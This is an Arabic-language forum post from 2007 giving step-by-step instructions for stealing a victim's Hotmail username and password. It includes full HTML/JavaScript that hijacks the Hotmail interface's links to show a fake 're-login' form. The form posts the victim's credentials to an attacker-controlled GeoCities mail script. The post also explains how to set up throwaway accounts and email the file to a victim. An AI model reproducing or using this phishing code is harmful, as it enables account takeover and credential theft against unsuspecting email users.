02-21-2007, 09:16 PM
|
#1 (permalink)
|
|
بسم الله الرحمن الرحيم
تتحدث هذي القطعه عن كيفيه اختراق الهوت ميل و سرقه الباسورد و اليوسرنيم للضحيه وبذلك يكون لك الحق في التحكم في الاميل تحكم كامل
ويتم هذا عن طريق الjava script
اي انك تقوم بارفاق ملف الجافا مع الاميل و ذلك سيدفع المستخدم الي اعاده النسجيل و هكذا تحصل علي البيانات الخاصه به
طريقه استخدام هذي الثغره
[hide]
1- قم بتسجيل و عمل ايميل لك في الهوتميل ولا داعي لكتابه البيانات صحيخه
2-اذهب الي geocities و قم ياختيار username وليكونybwc ثم قم بالتسجيل من اجل صفحه لك و ادخل بيانات خاطئه فيما عدا الاميل (اي ادخل فقط الاميل الذي فرغت من تسجيله في الهوتميل) و نتيجه هذي الخطوه ستحصل علي اميل جديد و سيكون بعنوان ybwc@geocitis.com (ybwc@geocitis.com)
3-افتح النوتباد و اكتب هذا الكود
<html><head></head><body>
"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot
Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\">Time expired. Please re-login.</font>
" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.- تم حذف البريد -/errormsg.html\">(Get more info regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\" target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.- تم حذف البريد -\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font>
<input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font>
<input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"> <input type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.- تم حذف البريد -\" target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"
<img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";
}
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="java script:getmess()";
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="java script:getmess()";
}
</script>
</body>
</html>
ثم قم بحفظ الملف بامتداد html و ليكون message.html و ضع في الاعتبار ان اسم المستخدم و هو ybwc l,موجود في السطر رقم 17 اي انك تستطيع التغيير الي اسم مستخدم خاص بك!
4-اكتب رساله و ارفق بداخلها السكربت او ملف الرساله المحفوظه باسم message.html و ارسلها الي ايميل الضحيه
5-انتظر حتي يفتح الضحيه الاميل الخاص به ثم اذهب الي اميلك في الgeocities
و ستجد رساله بداخلها الاي بي و اسم المستخدم و كلمه المرور
تحياتي لكم
[/hide] |
| |